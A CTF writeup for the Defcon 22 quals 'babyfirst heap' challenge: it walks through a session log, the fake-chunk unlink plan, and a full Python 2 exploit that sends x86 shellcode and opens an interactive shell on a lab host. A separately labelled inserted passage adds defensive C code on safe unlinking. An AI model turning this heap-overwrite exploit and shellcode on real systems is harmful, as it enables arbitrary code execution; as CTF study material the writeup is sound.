Saturday, May 24, 2014

Defcon 22 quals - babyfirst heap writeup

mangoui-MacBook-Pro:~ kjungi704$ nc 10.211.55.4 8989 

Welcome to your first heap overflow...
I am going to allocate 20 objects...
Using Dougle Lee Allocator 2.6.1...
Goodluck!

Exit function pointer is at 804C8AC address.
[ALLOC][loc=80A9008][size=1246]
[ALLOC][loc=80A94F0][size=1121]
[ALLOC][loc=80A9958][size=947]
[ALLOC][loc=80A9D10][size=741]
[ALLOC][loc=80AA000][size=706]
[ALLOC][loc=80AA2C8][size=819]
[ALLOC][loc=80AA600][size=673]
[ALLOC][loc=80AA8A8][size=1004]
[ALLOC][loc=80AAC98][size=952]
[ALLOC][loc=80AB058][size=755]
[ALLOC][loc=80AB350][size=260]
[ALLOC][loc=80AB458][size=877]
[ALLOC][loc=80AB7D0][size=1245]
[ALLOC][loc=80ABCB8][size=1047]
[ALLOC][loc=80AC0D8][size=1152]
[ALLOC][loc=80AC560][size=1047]
[ALLOC][loc=80AC980][size=1059]
[ALLOC][loc=80ACDA8][size=906]
[ALLOC][loc=80AD138][size=879]
[ALLOC][loc=80AD4B0][size=823]
Write to object [size=260]:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Copied 93 bytes.
[FREE][address=80A9008]
[FREE][address=80A94F0]
[FREE][address=80A9958]
[FREE][address=80A9D10]
[FREE][address=80AA000]
[FREE][address=80AA2C8]
[FREE][address=80AA600]
[FREE][address=80AA8A8]
[FREE][address=80AAC98]
[FREE][address=80AB058]
[FREE][address=80AB350]
[FREE][address=80AB458]
[FREE][address=80AB7D0]
[FREE][address=80ABCB8]
[FREE][address=80AC0D8]
[FREE][address=80AC560]
[FREE][address=80AC980]
[FREE][address=80ACDA8]
[FREE][address=80AD138]
[FREE][address=80AD4B0]
Did you forget to read the flag with your shellcode?
Exiting

A Doug Lea malloc exploitation challenge!!!


* The 11th block always has size 260
* Every block except the 11th has a random size


--IDEA-------------------------------------------------------------
1. fill the 11th block with shellcode + NOP padding
2. make a fake chunk with size=261, fd = printf_got, bk = address of the 11th block
-------------------------------------------------------------------
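The plan above works because dlmalloc 2.6.x unlinks a free chunk by trusting the fd/bk pointers stored inside that chunk; once the overflow has replaced them, the two pointer writes in unlink become a write to an address of the attacker's choosing (here a GOT slot). The following added example is not part of the writeup or of dlmalloc itself: it models that unlink step in a simplified chunk structure and contrasts it with the "safe unlinking" check that later allocators (glibc and newer dlmalloc releases) perform before trusting fd/bk. The `victim` and `buffer` objects are constructed sample memory standing in for a GOT entry and the overflowed block; nothing here reads the challenge binary.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Simplified model of a dlmalloc 2.6-style free chunk. The fd/bk links are
 * stored inside the freed chunk itself, right after the size field, which
 * is why an overflow from the neighbouring block can rewrite them.
 * (Illustrative layout, not dlmalloc's actual source.) */
struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;
    struct chunk *bk;
};

/* The original unlink: two writes whose addresses come straight from fd
 * and bk. If both are attacker-controlled, this is an arbitrary write. */
static void unlink_unchecked(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* "Safe unlinking": refuse unless both neighbours still point back at p.
 * Forged fd/bk values fail this check, so the free is aborted instead. */
static bool unlink_checked(struct chunk *p)
{
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return false; /* corrupted double-linked list */
    fd->bk = bk;
    bk->fd = fd;
    return true;
}

/* Build a circular free list: head <-> a <-> b <-> head */
static void build_list(struct chunk *head, struct chunk *a, struct chunk *b)
{
    memset(head, 0, sizeof *head);
    memset(a, 0, sizeof *a);
    memset(b, 0, sizeof *b);
    head->fd = a; a->bk = head;
    a->fd = b;    b->bk = a;
    b->fd = head; head->bk = b;
}

/* Legitimate case: removing a from an intact list passes the check and
 * leaves head <-> b. Returns true on success. */
bool legit_unlink_ok(void)
{
    struct chunk head, a, b;
    build_list(&head, &a, &b);
    return unlink_checked(&a) && head.fd == &b && b.bk == &head;
}

/* Tampered case: a's fd/bk were overwritten the way the fake chunk in the
 * writeup does (fd -> a GOT slot, bk -> the attacker's block). 'victim' and
 * 'buffer' are constructed sample memory. Returns true if the unlink wrote
 * into the victim slot. */
bool tampered_unlink_modifies_victim(bool use_check)
{
    struct chunk head, a, b;
    struct chunk victim;   /* stands in for memory around a GOT entry */
    struct chunk buffer;   /* stands in for the overflowed block */
    build_list(&head, &a, &b);
    memset(&victim, 0, sizeof victim);
    memset(&buffer, 0, sizeof buffer);

    a.fd = &victim;  /* forged by the overflow */
    a.bk = &buffer;

    if (use_check)
        (void)unlink_checked(&a);   /* victim.bk != &a, so nothing is written */
    else
        unlink_unchecked(&a);       /* victim.bk = &buffer: the GOT overwrite */

    return victim.bk == &buffer;
}
```

The check costs two comparisons per unlink and turns the overflow from a code-execution primitive into a detectable crash, which is why it is now standard in production allocators; heap-hardening efforts such as checking the size field against the next chunk's prev_size close the remaining variants.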


#!/usr/bin/python
# Python 2 exploit script for the babyfirst heap challenge
from struct import *
from socket import *

p = lambda x : pack("<L",x)       # pack a 32-bit little-endian value
up = lambda x : unpack("<L",x)[0] # unpack a 32-bit little-endian value

s = socket(AF_INET,SOCK_STREAM)
s.connect(('10.211.55.4',8989))

shellcode = "\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xfe\xc8\x88\x06\x46\xe2"+\
"\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69"+\
"\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81"
printf_got = 0x804bffc
size = 260          # fake chunk size field
fd = printf_got     # fake chunk fd
bk = 0              # fake chunk bk: filled in with the 11th block address below
payload = ""

print s.recv(1024)          # banner
hehe = s.recv(2056)         # the [ALLOC] lines
hehe = hehe.split("\n")
for i in hehe:
    # find the fixed-size (260) block; str.find() returns -1 when absent,
    # which is truthy, so test membership instead
    if "size=260" in i:
        bk = int(i[12:19],16)   # "[ALLOC][loc=XXXXXXX]..." -> hex address
        break

payload += shellcode.ljust(260,"\x90")   # shellcode + NOP padding fills the 260-byte block
payload += p(size)                       # overwrite the following chunk's size field
payload += p(fd)                         # ... its fd
payload += p(bk)                         # ... its bk

s.send(payload+"\n")
print s.recv(2000)

# interact with the shell
while 1:
    print s.recv(1024)
    cmd = raw_input("$ ")
    s.send(cmd+"\n")

CLEAR!
